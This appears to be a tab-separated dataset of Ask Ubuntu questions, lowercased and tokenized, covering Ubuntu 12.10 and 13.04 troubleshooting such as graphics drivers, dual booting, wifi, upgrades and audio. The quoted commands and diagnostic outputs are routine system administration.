286180	i ca n't install ubuntu 13.04 on a new computer	i managed to install ubuntu 13.04 by disabling `` virtualization technology '' in my bios ( which i believe let 's me operate several os 's ) and changing in grub2 quiet splash to quiet splash nomodeset . however , when i reboot after installation ( i installed the third party software ) , my screen will start blinking again . so i again changed the command quiet splash to quiet splash nomodeset but now i end up in what i believe is the terminal . but i do not know how to proceed from here . my computer is a toshiba satellite s855-s5170 and i attribute this problem to the dual graphics card ( amd radeon hd 7670m graphics 2gb ddr3 ) update 27/04/13 i changed 'quiet splash ' to 'nomodeset ' as it was suggested , but i did the same thing ( i end up in the terminal ) then ( inside the terminal ) i tried 'startx ' but it says that ' [ ksm ] drm report modesetting isnt supported ' 'fatal error : no screens found ' what can i do now ? thanks for the support .
286181	how do i recover my accidentally lost windows partitions after installing ubuntu ?	i have a toshiba satellite a-200 laptop with a vista os on it with 4 ntfs partitions ( c : ) vista ( d : ) entertainment ( e : ) work ( f : ) sources and i wanted to start using ubuntu instead . so i tried it first from the live cd and everything was ok and all the partitions were shown and working and so i decided to install ubuntu to replace vista on the ( c : ) drive . after i did that i can no longer find my folders and files on the ( d : ) , ( e : ) , ( f : ) partitions and the only file system that is shown is one 198 gb although my hdd is 320 gb . i ca n't access the lost data on the remaining 120 gb which i hope is still there and not totally lost i am now working from the live cd but i am unable to install testdisk . can i recover the vista partitions by the product recovery cd to get my laptop back to the factory settings ? can i recover the ntfs partitions using a recovery program for windows or will that make the problem worse ? i need these data badly as i do n't have a backup for them .
286184	how to get hibernate button in unity shutdown dialog in ubuntu raring 13.04 ?	i checked that hibernation works on my laptop via pm-hibernate command , and then enabled hibernation . the unity panel menu shows an option for hibernation now , and it works fine . my question here is , how to add it to the unity shutdown dialog . since 13.04 , unity has a new shutdown prompt when we press the power button , and it does not contain hibernate option even after enabling it .
286187	wifi is very slow , card rt5390	i 've brand new asus x501a and ubuntu 12.04 ( and i 'm bad in ubuntu ) and the wifi is extremely slow - 1mb/s . wifi chip is rt5390 . i tried everything i found in the net , so i need step by step instructions . pabris @ orientexpress-ernests : ~ $ sudo lshw -c network *-network description : wireless interface product : rt5390 wireless 802.11n 1t/1r pcie vendor : ralink corp. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : a4:17:31:50:11:66 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=3.5.0-23-generic firmware=0.34 ip=192.168.1.102 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : f7d00000-f7d0ffff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0.2 bus info : pci @ 0000:03:00.2 logical name : eth0 version : 0a serial : 08:60:6e:99 : fd : a4 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8411-1_0.0.2 03/27/12 ip=192.168.1.101 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:42 ioport : e000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff
286190	is there something limits the cpu usage for a process and its children	i was wondering about something like cpulimit to limit the process cpu usage but i am aiming to apply the same percentage of usage for its children processes too automatically without adding them manually in terminal by hand , so is there something limits the cpu usage for a process and its children ? thanks in advance .
286196	how to transfer an iphoto library to a file based structure and how to manage them properly ?	i need to export my old iphoto library to a file based structure similar to the format of shotwell . there are some possiblities : just use the iphoto master folder use shotwell to import the photos use a script like script 1 or script 2 there are however several problems : the iphoto master folder is organzied by import time so its not quite optimal to use it without iphoto . shotwell has a issue as its generating/copying jpegs out of raw files and this can take ages with a 50gb raw library . with script 1 the problem is that it only generates metadata and script 2 i ca n't get running proberly . so the question is what is the best way to transfer them and finally organize my photos in ubuntu ? for raw editing im gon na using darktable but this ca n't be used to manage photo libraries
286197	how to install google chrome on ubuntu 13.04	i am trying to install google chrome on ubuntu 13.04 , but it does not install . output : selecting previously unselected package google-chrome-stable . ( reading database ... 173123 files and directories currently installed . ) unpacking google-chrome-stable ( from ... /google-chrome-stable_current_amd64.deb ) ... dpkg : dependency problems prevent configuration of google-chrome-stable : google-chrome-stable depends on libgconf2-4 ( > = 2.27.0 ) ; however : package libgconf2-4 is not installed . google-chrome-stable depends on libudev0 ( > = 147 ) ; however : package libudev0 is not installed . google-chrome-stable depends on libxss1 ; however : package libxss1 is not installed . dpkg : error processing google-chrome-stable ( -- install ) : dependency problems - leaving unconfigured processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for man-db ... errors were encountered while processing : google-chrome-stable those dependencies does n't install .
286203	no new version found . upgrading 12.10 to 13.04	i have been trying to upgrade to 13.04 since the last two days . as advised on many other questions , i have removed the ppa and checked the repositories . as soon as i run update-manager , it searches for all the updates and then says no new release found . why does this happen with every upgrade !
286205	gnome-terminal - copy file and place in separate directory	i was wondering how i could copy a file and paste it in a separate directory ( like a different folder besides the current one ) in the gnome-terminal . any suggestions ? thanks !
286208	after charging the permissions , why ca n't you execute a .run shell lscript from the terminal in ubuntu 13.04 ?	you used to double-click and it would ask you if you wanted to open it in the text editor or run in the terminal . now i have to open the terminal myself and type the appropriate shell command .
286217	how can you create a command with a bash file	i created a .sh ( or bash ) file and i would like to make a command in gnome-terminal for the file . i know you run a .sh file by : ./file.sh after you compile it , i also know all the command are stored in /bin/bash . but i ca n't seem to figure out how i can create a command that i can call when i am in any directory in the terminal , something like : abc would run abc.h , etc . any suggestions ?
286219	terminal aborts installation of a package no matter what i type	when i 'm trying to install a package , say chromium i type this in the terminal : sudo apt-get install chromium then it says : after this operation , 3.1415926 mb of additional disk space will be used . do you want to continue [ y/n ] ? then when i type in yes or y or y or whatever i tried everything but no matter what i type it shows up like this : abort . i just did a clean installation of 13.04 yesterday and did n't have this problem before when i was using 12.04 ( y always works ) . how do i fix it ? by the way lxterminal does n't have this problem .
286221	how to setup network on a small lan	i have a small network with populated with 4 or 5 machines all on the same router . at this time i 'm developing software so the router is connected to the internet but when deployed this will be a standalone lan . when deployed only one machine will have windowing ( gnome ) , the others will be headless , boot to command line , and start an application automatically but right now all are booting to gnome . there is also a gps enabled ntp server appliance ( not a computer ) on the lan . all the ip addresses are fixed . how should this be set up ? i 'm asking because i think i see some problems . for instance the resolv.conf files are identical and i 'm told that gnome runs some kind of a nameserver . nameserver 127.0.0.1 all the host files are : 127.0.0.1 localhost loopback # hpnotebook is the local machine 192.168.1.200 hpnotebook master 192.168.1.201 orange 192.168.1.202 blue vis 192.168.1.203 maroon mir 192.168.1.204 green tir 192.168.1.210 nts ntpserver when deployed the computer `` orange '' will act as the master and run gnome with a monitor etc . and `` hpnotebook '' will not be present as it 's only for development and debugging . samba is running . i am doubting that the lan is configured correctly because ntpq shows that the clocks are not being set as accurately as they should be and , if i understand the output correctly , it is telling me that the ntp serve appliance is not on the local lan , but it is . using tcpdump from hpnotebook i see traffic that i do n't understand . sudo /usr/sbin/tcpdump | grep nts 14:16:05.467044 arp , request who-has nts tell hpnotebook , length 28 14:16:05.467214 arp , reply nts is-at 00:20:4a : bd : af:8a ( oui unknown ) , length 46 14:17:09.462100 ip hpnotebook.ntp > nts.ntp : ntpv4 , client , length 48 14:17:09.501020 ip nts.ntp > hpnotebook.ntp : ntpv4 , server , length 48 14:17:14.475039 arp , request who-has nts tell hpnotebook , length 28 14:17:14.475255 arp , reply nts is-at 00:20:4a : bd : af:8a ( oui unknown ) , length 46 14:17:23.664651 arp , request who-has maroon tell nts , length 46 14:17:27.107981 arp , request who-has nts tell nts , length 46 14:18:15.462146 ip hpnotebook.ntp > nts.ntp : ntpv4 , client , length 48 14:18:15.501096 ip nts.ntp > hpnotebook.ntp : ntpv4 , server , length 48 it looks to me as if hpnotebook and maroon are continually asking what the mac address of nts ( the time server ) is . orange is running but it is not asking hpnotebook . should n't the mac address of nts be in a table somewhere as part of the lan setup ? i 'm still attempting to learn linux and ubuntu . i 've been searching for answers but have not yet found them .
286229	i 've downloaded wubi 12.10 but it throws me an error	i have windows 7 and i 've downloaded wubi 12.10 and installed it without problems , but when i boot my computer and select ubuntu it appears an error : try ( hd0,0 ) : ntfs5 : no wubildr try ( hd0,1 ) : ntfs5 : 2 try ( hd0,2 ) : invalid or null try ( hd0,3 ) : invalid or null error while reading mbr of drive ( hd01 ) try ( fd0 ) : invalid or null error : can not find grldr in all devices . press alt+ctrl ... .
286233	how to add a skype indicator ?	i 've installed skype , but the icon is not shown at the top panel ( tray ) . as `` tray-whitelist '' was removed from dconf , i ca n't add icon by myself .
286236	how to install xnviewmp using package management aptitude `apt-get` on ubuntu 12.10 ?	how to install xnviewmp using package management aptitude apt-get on ubuntu 12.10 ? visiting https : //apps.ubuntu.com/cat/applications/xnviewmp/ and clicking through to software center ends results in a not found error . screenshot : http : //dl.dropbox.com/u/11744656/20130423-01.png i have all the ubuntu software sources enabled , and the `` partners '' sources as well . both apt-cache searches return no results as well . apt-cache search xnview and apt-cache search xnviewmp i 'm wondering if i 'm missing something in /etc/apt/sources.list alternatively , how can i find something from either xnview.com or apps.ubuntu.com that will show me what i could add to sources.list to allow updating via `` apt-get update '' . i ended up installing the package using dpkg -i xnview ... deb -- but i 'd like to understand what i 'm missing in the above fails . i asked on # ubuntu a few times and was just encouraged to install using the *.deb . thanks much for any help !
286249	grub and easy bcd	i have installed windows 7 over ubuntu 12.04 ( on a different partition ) and since i have installed windows 7 as the last step , grub did not start and windows 7 booted automatically . in order to solve this problem , i had installed easybcd and added second partition and everything was okay , but i had 2 grub screens . the first grub screen included windows 7 and linux nero start , and i could have accessed ubuntu had i chose the linux nero start entry ( which included ubuntu and windows 7 ) . in the process of trying to eliminate the other grub screen , i deleted the windows 7 grub screen on easybcd by accident , and now i can not boot windows 7 despite it being visible on grub . if i choose ubuntu , everything is ok , but if i try to choose the windows 7 entry , the same grub menu screen boots again . can you please help me with my problem ?
286251	unable to upgrade to 13.04 from 12.10	when i open sortware update application i am not seeing any notification about a new release . so i tried to manually upgrade by running sudo apt-get update sudo do-release-upgrade and i am getting this error : checking for a new ubuntu release traceback ( most recent call last ) : file `` /usr/bin/do-release-upgrade '' , line 145 , in < module > fetcher.run_options += [ `` -- mode= % s '' % options.mode , attributeerror : type object 'distupgradefetchercore ' has no attribute 'run_options' how do i upgrade to 13.04 ?
286253	ubuntu 13.04 amd/intel hybrid switchable graphics not working !	i 'm using ubuntu 13.04 on the hp pavilion dv7-6175us with amd radeon hd 6490m/intel hd graphics 3000 switchable graphics . how can i make switchable graphics work on ubuntu ?
286257	headphone jack resets in alsa when unplugged . 13.04	i have been able to get my headphones to work using the alsa mixer , but it resets whenever the headphones are unplugged or the computer is rebooted . i never had this problem with previous versions , and i ca n't seem to find a solution . computer is an hp pavilion dv7 with beats audio ( though , i doubt that maters with linux ) . intel soundcard . running ubuntu 13.04 64 bit . any help would be appreciated . i 've only been using ubuntu for a few months , so i 'm no expert .
286262	graphical glitch on ubuntu 13.04	the error : http : //i.imgur.com/per0ne9.jpg so there it is . running : ubuntu 13.04 ( 64bit ) on a lg e300 with a radeon xpress 1250 is there a solution to this ? i did try fglrx ... that did not end well . i 'm not sure what else i need to post so please comment if you need more info .
286263	how to execute a file as program ?	i ca n't execute it as program in ubuntu 13.04 i tried properties and then permissions then execute a file as program and when i open it it opens by gpedit i also tried chmod +x filename.sh and did not work and help ? ?
286264	how to install ubuntu 13.04 inside windows 8 from iso	i have downloaded the iso file of ubuntu 13.04 , and mounted it to a virtual disk using daemon 's tool . i want to install it inside windows , and thus launching wubi.exe with -- force-wubi flag . but the installation fails every time . how can i fix this ?
286272	issue switching between wifi drivers	i 've been having issues with my wifi lately , so i followed the steps here and the driver brcmsmac seems to work perfect on my computer . then , i blacklisted wl and b43 : echo `` blacklist drivername '' | sudo tee -a /etc/modprobe.d/blacklist-broadcom-wireless.conf updated initframs sudo update-initramfs -u and every time i restart my computer i have to do the sudo modprobe brcmsmac command to activate my wifi . any help would be greatly appreciated .
286273	window theme wo n't change ( gnome 3.8 )	i 've just upgraded from 12.04 , to 12.10 , to 13.04 using the software updater , and i 've upgraded gnome from 3.4 to 3.8 . the problem is , when i try to change my theme using the tweak tool , i am only able to change the gtk part of the theme . when i select another theme under the `` current theme '' , nothing happens , not even when attempting to switch between the default themes . the result is windows with two different themes . does anyone know how to fix this ? and yes , the themes i have are 3.8 compatible .
286274	why are there start 's ' symlinks in rc0.d ( shutdown ) and rc6.d ( reboot ) ?	start 's ' symlinks in shutdown and restart runlevels ? why are there 's00-s99 ' start symlinks in rc0.d and rc6.d ? ubuntu 13.04 directory listing : $ ls -l /etc/init.d/rc6.d lrwxrwxrwx 1 root root 29 oct 30 12:05 k10unattended-upgrades - > ../init.d/unattended-upgrades lrwxrwxrwx 1 root root 20 apr 4 15:07 k21postgresql - > ../init.d/postgresql -rw-r -- r -- 1 root root 351 jan 30 04:58 readme lrwxrwxrwx 1 root root 18 mar 6 2011 s20sendsigs - > ../init.d/sendsigs lrwxrwxrwx 1 root root 17 mar 6 2011 s30urandom - > ../init.d/urandom lrwxrwxrwx 1 root root 22 mar 6 2011 s31umountnfs.sh - > ../init.d/umountnfs.sh lrwxrwxrwx 1 root root 20 oct 7 2012 s35networking - > ../init.d/networking lrwxrwxrwx 1 root root 18 mar 6 2011 s40umountfs - > ../init.d/umountfs lrwxrwxrwx 1 root root 20 mar 6 2011 s60umountroot - > ../init.d/umountroot lrwxrwxrwx 1 root root 16 mar 6 2011 s90reboot - > ../init.d/reboot as you can see , the first two scripts are 'k ' ( kill ) scripts , which is what we 'd expect in rc0 and rc6 runlevels , however the next seven scripts are 'start ' scripts . i 've read the /etc/init.d/rc script and understood that for runlevels 0 and 6 $ action is hardcoded to stop so , even the 's ' start scripts are passed the 'stop ' command : case `` $ runlevel '' in 0|6 ) action=stop # count down from 0 to -100 and use the entire bar first_step=0 progress_size=100 step_change=-1 ; ; again my question is , why even bother with 's00 - s99 ' scripts in the shutdown and reboot runlevels ? why are n't they all 'k00 - k99 ' symlinks ?
286276	bootable usb . problem	i have a problem while installing the bootable usb on ubuntu . after the installation it will get to a `` finishing ... '' menu , and be stuck there for a long time . it has been 1 hour now . i do n't know what to do . the bar still moves back and forth , i 'm guessing that means it 's still working . but 1 hour is a little long for `` finishing ... '' someone help me please ?
286281	ubuntu 13.04 does n't show confirmation dialog for shutdown	after i updated to 13.04 , ubuntu immediately shuts down without confirmation when i press the power button . also , it does n't ask for confirmation if i select an otion from the top-right gear menu . i tried setting the flag org.gnome.gnome-session.logout-prompt to true in dconf-editor and i set the power button action to `` interactive '' in tweak tool .
286284	system no longer boots , gave up waiting for root device , ( initramfs ) , /dev/mapper/gnome-root does not exist	after installing an update , my system no longer boots . i have full disk encryption ( the one the installer sets up for you ) enabled so it usually asks for the key only seconds after booting past grub . now , it skips asking for the key , tries to load gnome , and then goes to the screen pictured below . the system is a 64-bit system76 box running ubuntu gnome 13.04 . this has happened to me once in the past however , on a dell xps 8300 64-bit running ubuntu gnome remix 12.10 . in that case i reinstalled the os . however i want to actually fix the problem this time so i know how to handle it in the future . also , it is extremely inconvenient to reinstall from scratch . my suspicion is that something got screwed up in a config file in /boot such that it does n't realize the disk is encrypted , but i did n't see anything when poking around in there . do you have any ideas of how to fix it ( besides re-installing the os ) ? ?
286285	why is n't ubuntu tweak 's janitor working ?	whenever i use ubuntu tweak 's janitor to clear caches and i select all the files i want to delete and click `` clean '' nothing happens . ( see the screenshot below ) this has only began since i upgraded from 12.10 to 13.04 .
286286	error when creating a view or controller in monodevelop	i get the following error when i attempt to add a view or controller to my monodevelop project : invalid sdk version name i am using monodevelop 4.0 , which i got from the following ppa : launchpad.net/~keks9n/+archive/monodevelop-latest and i installed mono using sudo-apt get install mono-complete mono -v in terminal tells me that the version is 2.10.8.1
286289	are there any 32-bit version for ubuntu server 13.04 ?	are there any 32-bit version for ubuntu server 13.04 ? since i can only download 64-bit version from ubuntu.com
286291	replacing the video driver when the current driver does not work at all	i put ubuntu 12.10 on an inspiron 5150 with the nvidia geforce fx5200 . it was fully operational with windows xp home when i started . it now boots to a black screen with a mouse cursor . i formatted and reinstalled with it connected to the internet , same result . when i tried failsafe video mode , that did not work either . i understand that a new video driver is required and that it is available . i can not find any directions that work for how to change the video driver if your current video driver is not working at all . i tried `` sudo apt-add-repository ppa : ubuntu-x-swat/x-updates '' but it says can not access ppa ... please check your internet connection . '' i have downloaded nvidia-173-updates_173.14.35-0ubuntu1_i386.deb , but i am not even sure if that is the right file . assuming that is the right file and i have it on a usb drive , can someone walk me through the process of installing the driver ? thanks in advance !
286296	how can i create a shared folder using command line ?	on a stand-alone pc , using the live cd of ubuntu , how can i create a shared folder using command line ? after this , how can shared folder be shared with a group utilizing command line ? lastly , how can i change the permission of shared folder only for the group as read write and execute , and none others , except for the root as the owner ?
286297	is there a work around to get protected hulu or amazon prime instant videos working ?	when i went to watch some only episodes of star trek on amazon prime , the player would get stuck on updating . i followed the instructions here and doing so actually worked for 3 seconds . it was the oddest thing . clearly the video was playing and i saw 3 seconds of the episode , but a message came up saying i needed to update my flash player . i tried loading videos over and over again , but no success , not even the 3 seconds . here is the error message : sorry we were unable to stream this video . this is likely because your flash player needs to be updated . i am running ubuntu 13.04 raring ringtail , firefox 20 , and adobe flash-player 11,2,202,280 . apparently adobe is n't going to make newer versions of flash available for linux , only security updates . so has anyone been able to play prime instant videos , and if so , under what circumstances ? is there perhaps an alternative implementation of the flash plugin i can use ? or is the cause of my problem something different altogether ? problem probably has to do with the version of flash being used . if anyone has gotten prime to work with an my current version of flash or an open-source/free implementation of it , please do tell . or if anyone can get videos on amazon to play with any other parameters aside from changing my browser to chrome , please tell me . this also affects protected content in hulu and other services that employ drm through flash . what has n't worked : using chrome which has the newest version of flash via ppapi . amazon prime strictly prohibits it . using chromium has the same issue as using firefox trying to install adobe flash 11,2,202,275 . is not compatible with raring libraries ( ? ) .
286301	unable to locate package when running apt-get	i installed rvm and it tells me i 'm missing some packages : viggy @ viggy : ~ $ rvm requirements installing requirements for ubuntu , might require sudo password . skipping `apt-get update` make sure your system is up to date . rvm autolibs is now configured with mode '2 ' = > 'check and stop if missing ' , please run `rvm autolibs enable` to let rvm do its job or run and read `rvm autolibs [ help ] ` or visit https : //rvm.io/rvm/autolibs for more information . missing required packages : libreadline6-dev , zlib1g-dev , libssl-dev , libyaml-dev , libsqlite3-dev , sqlite3 , libxml2-dev , libxslt1-dev , autoconf , libgdbm-dev , libncurses5-dev , automake , libtool , bison , libffi-dev . so i try to install them but get a ton of unable to locate package errors : viggy @ viggy : ~ $ sudo apt-get -- no-install-recommends install libreadline6-dev , zlib1g-dev , libssl-dev , libyaml-dev , libsqlite3-dev , sqlite3 , libxml2-dev , libxslt1-dev , autoconf , libgdbm-dev , libncurses5-dev , automake , libtool , bison , libffi-dev reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libreadline6-dev , e : unable to locate package zlib1g-dev , e : unable to locate package libssl-dev , e : unable to locate package libyaml-dev , e : unable to locate package libsqlite3-dev , e : unable to locate package sqlite3 , e : unable to locate package libxml2-dev , e : unable to locate package libxslt1-dev , e : unable to locate package autoconf , e : unable to locate package libgdbm-dev , e : unable to locate package libncurses5-dev , e : unable to locate package automake , e : unable to locate package libtool , e : unable to locate package bison ,
286303	make a script run at startup	first of all , sorry for my bad english . im using xubuntu 12.04 on acer aspire one d270.my screen brightness hotkeys ( fn+l/r ) dont work.i installed xbacklight but it always shows '' no outputs have backlight property '' . so i used this command : sudo setpci -s 00:02.0 f4.b=80 and it does work ! i made a session startup name `` brightness '' , command : '' sudo setpci -s 00:02.0 f4.b=80 '' but still have to manually execute from terminal . both with xbacklight or startup script is ok , as long as i can control my screen brightness . p/s : im noob , so please explain in detail .
286306	usb modem detected as usb storage	i already have usb-switch-mode installed but still my usb modem still not detected as it . i have search most of the topics regarding to this , but still no luck in searching the right answer . any suggestion would be appreciated . thanks !
286309	how to do a clean reinstall of ubuntu ?	if i just wipe the partition that ubuntu is currently installed on , would that work ? then just re install it onto the partition . or is there some other process ?
286310	wallpaper does n't appear	after i upgraded ubuntu 12.10 to 13.04 , the wallpaper does n't appear anymore . in instead , apeears a blank image . i already tried to change , but nothing happens . also , i already tried in gnome 3 and unity , and the problem persists . anyone can help me ? thanks .
286315	installing ubuntu 12.10 or 13.04 not available to boot	i have tried a live cd for both 12.10 and 13.04 and done the install alongside windows 7 option . it gets to the point it asks me where to install and the only option in the drop down is my wd passport external drive . i have not created a partition on my internal drive . either way , ubuntu completes the install , and reboots . immediately windows 7 loads , no option to boot to ubuntu to try it out . if i go into the boot options by using f8 , i can change boot device and my external drive shows twice . if i select the one , i get a grub prompt that says it can not boot . if i select the other ( ses ) then it starts into windows 7 right away ( windows is not installed on that drive , although there is a partition there for backup files ) . is ubuntu unable to boot from an external device ? would seem odd since a flash drive or cd both work . or do i need to create a partition on my internal main drive to allow ubuntu to dual boot ?
286317	command prompt stopped listening to me ; feeling rejected	i 'm sshing into my headless ubuntu 11.04 server using putty , and i 'm in a byobu session . i started a mysql_safe daemon because i was trying to fix a password problem i was having with mysql . i was following this tutorial : http : //myotragusbalearicus.wordpress.com/2011/11/21/mysql-error-1045-28000-access-denied-for-user-rootlocalhost-using-password-no/ the daemon started successfully , and i was able to finish the steps required on another byobu screen , but the screen i was on when i started the daemon is now refusing to accept input in a way that makes any sense to me . here 's the terminal text : username @ computername : /usr/bin $ sudo mysqld_safe -- skip-grant-tables 130427 10:43:53 mysqld_safe logging to syslog . 130427 10:43:53 mysqld_safe starting mysqld daemon with databases from /var/lib/mysql / cd / ls exit ^c ^x exit help /h stop sudo make me a sandwich the lines at the bottom were me wildly flailing with every `` stop this i do n't like it get me out of here '' commands that i could think of , but to no avail . the cursor just sits there mocking me , printing what i type but doing nothing with it . notice i tried exit twice in case it did n't hear me the first time . i 'm sure i could just close the screen , or the session , or just restart the server , but i 'd rather actually understand what 's happening . does it mean something when the prompt just stops listening to you ? is this expected behaviour in this situation ? i 'm sure this has a simple answer , but i do n't even know what language to use in a search , because i do n't know what to call this problem . feel free to point me to a duplicate , if it exists . also , if there 's a better title for this question , let me know . i did see this question ( strange thing happening in command prompt ) , but the answer of going to another session and typing pkill -cont bash did n't work for me . and even if that had worked , i would have been none the wiser as to what any of it actually means , which is what i 'm after here .
286319	msi bigfoot gaming lan killer e2200 not working	i have done lspci -vnn and got this 02:00.0 ethernet controller [ 0200 ] : qualcomm atheros killer e2200 gigabit ethernet controller [ 1969 : e091 ] ( rev 13 ) subsystem : micro-star international co. , ltd. device [ 1462:10be ] flags : bus master , fast devsel , latency 0 , irq 11 memory at f7300000 ( 64-bit , non-prefetchable ) [ size=256k ] i/o ports at d000 [ size=128 ] capabilities : < access denied > then i went here ! i figured that the [ 1969 : e091 ] ( rev 13 ) is the same hardware . i typed in sudo apt-get install build-essential linux-headers . this gives and error because it needs a version . i would like to know how to tell what version i will need ? i 'm using ubuntu 13.04 .
286324	ar9285 wireless network problem ubuntu 13.04	i just installed ubuntu 13.04 on my new lenovo ideapad using the live usb . my problem is that i can not connect to my wireless network . my wireless adapter is recognized as atheros communications inc ar9285 wireless network adapter .
286325	changing from 2 operating systems to just ubuntu	i have installed ubuntu 12.10 alongside windows . now i want to remove windows . is there an easier way to remove windows than uninstalling everything and installing ubuntu again ?
286326	unable to start vmware workstation after upgrade to 13.04	after upgrading to 13.04 i am unable to start vmworkstation . i get the following message : before you can run vmware , several modules must be compiled and loaded into the running kernel . kernel headers 3.8.0-19-generic kernel headers for version 3.8.0-19-generic were not found . if you have installed them in a non-default path you can specify the path below . does anyone have any idea what to do next ? ubuntu 13.04 64bit if i direct the path to : /usr/src/linux-headers-3.8.0-19-generic i get the following message : c header files matching your running kernel were not found . thanks additional : as suggested i run this in terminal : cd /lib/modules/ $ ( uname -r ) /build/include/linux sudo ln -s ../generated/utsrelease.h sudo ln -s ../generated/autoconf.h sudo ln -s ../generated/uapi/linux/version.h however , now i get the following : before you can run vmware , several modules must be compiled and loaded into the kernel cancel / install i install , the window closes and nothing happens ... . any ideas ? additional : i installed this : sudo apt-get install open-vm-tools open-vm-tools-dev open-vm-dkms open-vm-toolbox open-vm-tools-dev and it all launched ... many thanks for the suggestions and help ... this is what i love about ubuntu ... it has a great helpful community ... ! note : also found this which may help others too : here additional error : could not open /dev/vmmon : is a directory . please make sure that the kernel module `vmmon ' is loaded . failed to initialize monitor device . monitor settings all greyed out resolution : re-installation of nvidia drivers
286330	ubuntu 13.04 installation error	i have installed ubuntu 13.04 , but upon finalizing the installation , they system replaced some files and it now will not allow me to open any application . it also will not allow me to send an error report to find a fix for the problem . when i read the error message on the screen , it stated the following : an error occurred , please run package manager from the right-click menu or apt-get in the terminal to see what is wrong . the error message was : 'error : brokencount > 0 . this usually means that your installed packages have unmet dependencies . i have tried reinstalling some of the programs through the terminal , but it is not helping in the least . i have done some research , but i have not stumbled upon a fix for this specific issue . it is also getting stuck at the ubuntu screen when it is shutting down , and i have to manually shut it off . any help with this error would be greatly appreciated . if it helps in any way , here are my pc specs : xps 17 - l701x 8 gb ddr3 of ram intel core i7-2670qm cpu @ 2.20ghz x 8 integrated graphics ( as i never installed my nvidia graphics drivers ) ubuntu is installed on a 40 gb partition on my 1 tb hard drive ( set up through ubuntu windows installer ) thanks in advance !
286331	ethernet problem after upgrading to 13.04 wired connection	i upgraded from 12.10 to 13.04 but now i do not have an ethernet connection . i upgraded just an hour ago . is there a way to enable or check the hardware to see if my card is supported . i need help as i use this machine as my main machine for work . and i access this from the internet vnc if i 'm out .
286333	caffeine on ubuntu 13.04	i installed caffeine using a deb file ( ppa can not install caffeine ) on 13.04 it installed and indicator was showing but it did not work . any alternatives ?
286337	integrate network shares in lens results	i have movies , music and photos on a nas that i have permanently mounted through /etc/fstab . i noticed when i go into the launcher and click on any of the music , photo and video lens , the results do not include nas results ( my guess is because the lenses are looking in /music , /pictures and /videos instead of mounted shares ) . is it possible to modify the lenses to look in the share folder as well to show the results ?
286338	install ubuntu while running windows 8	i am trying to install ubuntu onto my secondary hdd ( f ) . i have windows 8 installed on my primary ssd ( c ) . i have an iso file of the 64 bit ubuntu installation on a usb . my question is can i install this directly onto the f drive or do i need to have the usb boot from restart . also , my c drive is booting uefi not sata , i think this is the problem i had when trying the first time . eventually i am trying to have my initial load screen ask me which os i would like to boot into . when i run the iso while in windows it takes me to the ubuntu installer screen where i specify language , password etc . this is not through wubi , i have tried that and got nothing but problems . i wanted a proper opinion before i make another drive useless and have to format .
286340	how to get ubuntu to use as much resources as lubuntu	well.. i love ubuntu , but it causes my laptop to use resources up , and i do n't even know why . it even cause my laptop 's fan to run louder and heat up ( not overheat , but it does get hot ) . as soon as i switch to the lubuntu desktop environment , and do the exact same thing , which is browse the internet using google chrome ( uses on tab most of the time ) , the laptop 's fan is not only quieter , but the computer cool down . i like using ubuntu for the features but i like lubuntu for the use of less resources . is there anyway to apply the use of less resources to ubuntu to make the laptop just as cool and tranquil as on ubuntu ?
286343	screen brightness very dim on a dell xps 13 ( 2013 )	i just installed xubuntu 13.04 on a new dell xps 13 ultrabook . when i boot up the screen brightness is extremely dim . adjusting the screen brightness does n't do anything . this is obviously a very new bug with 13.04 . any ideas ?
286345	installing ubuntu 13.04 using existing home partition fails	i have set my existing /home partition ( from about 10 previous distros ! ) as /home during install but can not login . rebooting into recovery mode and resetting password does n't help , however while in recovery mode as root , running ls /home gives a blank listing . it seems that ubuntu has neither established a new /home/john nor used the old /home/john . it may even have formatted the /home drive ( but definitely was not told to ) anyway my question - how do you get ubuntu to create new user files or better , use the existing /home/user as most distros do ? i have installed it twice now to no avail .
286346	microphone does not work on asus vivobook x202e	i have recently bought an asus vivobook x202e , with touch screen and windows 8 . i have tried to adjust the sound systems as many answers on this site suggest , but it still does n't work . i think asus x202e has it typical driver requirement or typical problem that can not be solved as the other notebook .
286356	how do i dual boot os x and ubuntu using an external dvd or usb ?	i 've installed refind and it works . i 've allocated free space on my internal harddrive . i 've burned an ubuntu 13.04 dvd and i 'm using an external dvd drive . refind recognizes the dvd but when i select it in the refind menu , it says the firmware can not boot from the dvd . it also says that refind does n't support booting from external medias . what are my options ? an idea i had was to setup another partition on my internal drive and copy the install files there and then ( somehow ) boot from that partition . not really sure how to do that . ideas welcome . i have a mid-2010 macbook pro ( internal dvd replaced with hdd ) .
286367	set audio to the speakers with headphones plugged in	for some weeks i was unable to use ubuntu due to windows 8 preventing its boot , so i noticed an interesting function that i missed in ubuntu : in windows 8 when i plug-in my headphones i was able to open the mixer options and set the speakers to reproduce the audio , even with the headphones plugged and more than that i was able to handle my skype conversations through the headphone while listening to my music , or youtube videos , or games in the speakers . although in ubuntu when i go `` sound settings ... '' > `` output '' i was unable to redirect the audio to the speakers while the headphone was connected . i have three options : digital output ( s/pdif ) built-in audio ; analog output built-in audio ; and analog headphone output built-in audio . when i choose digital i have no audio at all , in any situation . although it does n't matter if i choose analog or analog headphone the audio will be headed to the headphone . then i noticed that it was a problem : i am not able to use the speakers while my headphones are connected , the main point here is not to separate audio from skype , from the other things , i guess ( and hope ) that it can be easily set in skype settings once the main problem is fixed : set the speakers as primary reproduction devices even when my headphones are plugged in .
